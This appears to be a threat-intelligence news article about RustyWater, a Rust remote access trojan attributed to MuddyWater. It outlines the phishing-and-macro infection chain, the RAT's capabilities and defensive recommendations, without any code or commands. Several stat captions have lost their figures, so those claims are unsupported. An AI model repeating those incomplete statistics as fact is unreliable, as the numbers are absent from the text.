RustyWater RAT: MuddyWater Deploys New Rust Backdoor Targeting Middle East
Iranian APT group MuddyWater deploys RustyWater, a new RAT written in Rust, via sophisticated spear-phishing campaigns targeting government and energy sectors in the Middle East.
A Major Tactical Evolution
Increase in MuddyWater attacks since 2024
The MuddyWater group, also known as Seedworm and TEMP.Zagros, marks a significant turning point in its arsenal with the deployment of RustyWater. This new Remote Access Trojan (RAT), entirely developed in Rust, represents a major evolution from the group's traditional tools, primarily based on PowerShell and Python.
Sophisticated Infection Chain
of initial infections via malicious Word documents
The campaign uses highly targeted spear-phishing emails containing Word documents with obfuscated VBA macros. Once activated, these macros download and execute RustyWater in multiple stages to avoid detection.
Infection stages:
- Phishing email - Word document disguised as government report
- VBA Macro - Encoded PowerShell dropper execution
- Download - RustyWater payload retrieval via HTTPS
- Persistence - Registry Run key creation
- C2 Communication - Encrypted channel via TLS 1.3
RustyWater Technical Capabilities
distinct modules identified in the RAT
RustyWater integrates advanced features that distinguish it from MuddyWater's previous tools:
Main features:
- Keylogging with periodic screenshot capture
- File exfiltration with automatic compression
- Command execution via shell and PowerShell
- Lateral movement via WMI and SMB
- AV evasion through process injection
Impact and Attribution
confirmed compromised organizations across 6 countries
Researchers from Trend Micro and Mandiant have confirmed attribution to MuddyWater with high confidence, based on:
- C2 infrastructure shared with previous campaigns
- Characteristic obfuscation techniques
- Victimology consistent with Iranian interests
Security Recommendations
To protect against RustyWater:
- Disable Office macros by default
- Implement behavioral EDR detection
- Monitor outbound connections to recently registered domains
- Block SHA256 hashes of identified samples
- Train users on advanced phishing techniques
Frequently Asked Questions
RustyWater is a new Remote Access Trojan (RAT) developed in Rust by the Iranian APT group MuddyWater. It enables remote control of infected machines, including keylogging, data exfiltration, and command execution.
The attacks are attributed to MuddyWater, an Iranian APT (Advanced Persistent Threat) group linked to the Ministry of Intelligence and Security (MOIS). Active since 2017, this group primarily targets government and energy organizations.
Infection begins with spear-phishing emails containing malicious Word documents. Obfuscated VBA macros then download the RustyWater payload which installs itself and establishes a connection with the group's C2 servers.
Rust offers several advantages: better performance, secure memory management that reduces crashes, and most importantly a different footprint than traditional malware that complicates signature-based antivirus detection.
Protection measures include: disable Office macros by default, deploy EDR solutions with behavioral detection, monitor outbound network traffic, apply known IOCs, and regularly train employees on advanced phishing techniques.
Comments
Want to join the discussion?
Create an account to unlock exclusive member content, save your favorite articles, and join our community of IT professionals.
New here? Create a free account to get started.